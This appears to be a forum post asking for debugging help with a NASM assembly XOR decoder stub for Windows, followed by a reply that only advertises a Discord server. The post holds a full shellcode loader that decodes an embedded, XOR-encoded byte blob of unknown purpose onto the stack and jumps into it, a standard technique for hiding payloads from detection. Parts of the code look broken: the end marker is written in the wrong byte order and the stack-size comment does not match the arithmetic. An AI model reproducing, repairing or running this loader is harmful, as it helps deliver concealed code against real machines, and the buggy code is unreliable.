I am a novice in assembler programing, I will will appreciate if someone could review these NASM assembler code for me. Is about encoder decoder. The encoder performs the following:

pads the shellcode with NOP opcodes so it is 4 bytes aligned

a random byte is generated for each 4 bytes of the shellcode

the 4 bytes are put in the reverse order and XORed with the XOR byte

process is repeated until the 0x9090aaaa marker is reached

For those good at NASM assembler for Microsoft Windows, please could you check why my decoder isn’t running?

global main
section .text
main:
jmp short call_shellcode

decoder:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
pop esi ; address of shellcode
mov edi, 0xaaaa9090 ; end of shellcode marker
sub esp, 0x7f ; make room on the stack (512 bytes)
sub esp, 0x7f ; make room on the stack
sub esp, 0x7f ; make room on the stack
sub esp, 0x7f ; make room on the stack

decode:
mov bl, byte [esi + edx + 1] ; read 1st encoded byte
mov bh, byte [esi + edx + 2] ; read 2nd encoded byte
mov cl, byte [esi + edx + 3] ; read 3rd encoded byte
mov ch, byte [esi + edx + 4] ; read 4th encoded byte
xor bl, byte [esi + edx] ; xor with the key byte
xor bh, byte [esi + edx] ; xor with the key byte
xor cl, byte [esi + edx] ; xor with the key byte
xor ch, byte [esi + edx] ; xor with the key byte
mov byte [esp + eax], ch ; store in memory in reverse order to restore original shellcode
mov byte [esp + eax + 1], cl ; ..
mov byte [esp + eax + 2], bh ; ..
mov byte [esp + eax + 3], bl ; ..

cmp dword [esi + edx + 5], edi ; check if we have reached the end of shellcode marked
jz execute_shellcode ; if we do, jump to the shellcode and execute it

inc edx
inc edx
inc edx
inc edx
inc edx
add eax, 4
jnz decode

execute_shellcode:
jmp short esp

call_shellcode:
call decoder
encoder_shellcode: db 0x6c,0x6c,0xe3,0x84,0x90,0x74,0x45,0x14,0x74,0x74,0x41,0x13,0xca,0x25,0x93,0x7d,0x71,0x2f,0xf6,0x4d,0x9c,0x15,0x88,0xce,0x17,0xf8,0xb2,0x4f,0xf7,0x1d,0x79,0x51,0x0b,0xf2,0x5f,0x2f,0xef,0x1e,0xd0,0x1e,0x82,0xfe,0xe3,0xbe,0x2e,0x39,0xf8,0x19,0x15,0x3b,0x5a,0x9d,0x5b,0x57,0x95,0x05,0x57,0xea,0x70,0x4c,0x7e,0x29,0x6e,0x2c,0xf5,0x9b,0x9a,0xa7,0xd9,0x10,0x61,0x19,0x21,0xea,0xb1,0x0f,0x43,0x7b,0xcf,0x8a,0xb4,0xfc,0x3f,0x64,0xb5,0x6d,0x35,0xe6,0x3d,0x75,0xd1,0x54,0x02,0xd0,0xf1,0xbf,0xf6,0x83,0xcb,0x76,0x5d,0x6c,0xd6,0x69,0xd6,0x26,0x17,0xf0,0x27,0xd9,0x10,0x1d,0xdf,0xd1,0xd0,0x3e,0x06,0xf9,0x3f,0x92,0x91,0x92,0x65,0xe4,0x71,0x32,0x4f,0x09,0xca,0x4f,0x83,0xdb,0x63,0xf6,0xa7,0xea,0xeb,0xce,0xb2,0x61,0x79,0x75,0xf2,0x1f,0xaa,0xd4,0xc8,0x8c,0x5f,0x9f,0x11,0x15,0x9a,0xc2,0x10,0xe5,0x6c,0x35,0xe4,0x6e,0x74,0x2f,0x50,0x50,0x30,0x43,0x19,0x1a,0x22,0x18,0x65,0x3d,0x85,0x9a,0x34,0x83,0x91,0x08,0xd9,0xdc,0x3a,0xc5,0xc5,0xba,0xd3,0x72,0x41,0x1a,0x2f,0x8d,0x0b,0x63,0x0b,0x0b,0x39,0xa7,0xf8,0x95,0xd4,0xd0,0xa6,0xd1,0xea,0xce,0xf2,0xa0,0x48,0x29,0xa7,0x86,0x0b,0x9b,0xb3,0xdb,0xf4,0xdf,0xf6,0xdf,0xdf,0xde,0x28,0x40,0x78,0x7c,0xec,0xe1,0xe1,0x8a,0x61,0xc8,0x70,0x7a,0x1a,0xa5,0x8f,0xbd,0xb7,0xaa,0x11,0xd5,0x06,0x06,0x04,0x6e,0x2e,0xc8,0x2e,0x41,0x94,0xd9,0x05,0x55,0x55,0x55,0x55,0x57,0x07,0x17,0x07,0x17,0x06,0xd9,0x09,0xec,0x6e,0xbf,0x28,0x6a,0x40,0x5f,0xb9,0xee,0xef,0xa9,0xd3,0x5a,0x2e,0xff,0xc3,0x32,0x27,0xa2,0xf2,0xd8,0x46,0xf2,0x0d,0xf8,0x86,0x32,0xc1,0x2d,0xb4,0xc9,0x8f,0x5e,0x5e,0x5e,0x39,0xb6,0x1f,0x75,0x1f,0x75,0x1f,0x51,0x39,0x06,0x07,0x55,0xbc,0xe3,0x74,0x65,0xbe,0x4c,0xb4,0xcf,0x99,0xb3,0x15,0x9e,0x23,0x6b,0x15,0x84,0xec,0xc4,0xee,0xb2,0xee,0xee,0xee,0xfe,0xee,0x6d,0x05,0x6d,0x07,0x3b,0xf6,0x13,0xa5,0x52,0xae,0xa2,0xf1,0x31,0x77,0x5d,0x3a,0x69,0x6c,0x3a,0x50,0xae,0x77,0xac,0xc6,0xf9,0x62,0xb7,0x9d,0x3d,0xaa,0x5e,0x23,0x5e,0xa6,0xdd,0x15,0x15,0x7d,0x4d,0x3d,0x0a,0x60,0x0a,0x0a,0x4a,0x94,0x9f,0xfc,0xc4,0x94,0x1a,0xe5,0x2a,0x15,0x35,0xdc,0xa9,0xb4,0x8b,0x09,0x93,0x6c,0xf2,0xde,0xfd,0x76,0x89,0x28,0x28,0xa3,0x6b,0xee,0x64,0x4f,0x67,0xa9,0x56,0x56,0x56,0xd9,0x19,0xe6,0xe6,0x82,0xf0,0x6f,0x46,0xac,0x6e,0x90,0x5e,0x9d,0x9f,0x2b,0x98,0xd3,0x71,0x66,0x23,0x68,0xec,0xbf,0xec,0x86,0xba,0xce,0x5e,0x5e,0x1b,0x31,0x90,0x90,0xaa,0xaa

ret


Hello.

Join the discord Server. There you will find the help you need. Programmers are always exchanging programming help there. Please check.

Discord